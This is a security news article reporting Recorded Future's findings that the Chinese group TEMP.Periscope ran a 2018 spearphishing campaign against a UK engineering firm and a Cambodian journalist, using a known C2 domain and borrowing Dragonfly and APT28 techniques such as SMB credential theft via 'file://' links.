Attribution of cyber attacks is always a hard task, in many cases attackers use false flags to masquerade their identities.
Chinese hackers have targeted a UK-based engineering company using techniques and artifacts attributed to the Russia-linked APT groups Dragonfly and APT28, according to security researchers.
Threat intelligence experts from Recorded Future discovered that Chinese threat actor TEMP.Periscope was using TTPs associated with Russian APT groups in the attempt to make hard the attribution. The same campaign that targeted the U.K.-based engineering company also hit a freelance journalist based in Cambodia, attackers used a command and control infrastructure that was used in the past by the TEMP.Periscope APT group.
“Employees of a U.K.-based engineering company were among the targeted victims of a spearphishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights, and Chinese development.” reads the analysis published by Recorded Future.
“We believe both attacks used the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections. Crucially, TEMP.Periscope’s interest in the U.K. engineering company they targeted dates back to attempted intrusions in May 2017.”
The attackers used the domain scsnewstoday[.]com as C2, the same that was used in a recent TEMP.Periscope campaign targeting the Cambodian government.
The spear-phishing messages were sent by using the popular Chinese email client, Foxmail.
It is interesting to note that attackers employed a unique technique used in the past by Dragonfly APT group in attacks aimed at critical infrastructure. The attackers used a “file://” path in the in the spearphish calling out to a malicious C2 to steal SMB credentials.
“A unique technique documented as a Dragonfly TTP in targeting critical infrastructure was used in the attack. The technique attempts to acquire SMB credentials using a “file://” path in the spearphish calling out to a malicious C2.” continues the analysis.
“The attack probably made use of a version of the open source tool Responder as an NBT-NS poisoner. APT28 used Responder in attacks against travelers staying at hotels in 2017.”
The same UK engineering company was already targeted by TEMP.Periscope in a May 2017, months later the hackers also hit the US engineering and academic entities.
“Recorded Future expects TEMP.Periscope to continue to target organisations in the high-tech defence and engineering sectors,” concludes the report. – securityaffairs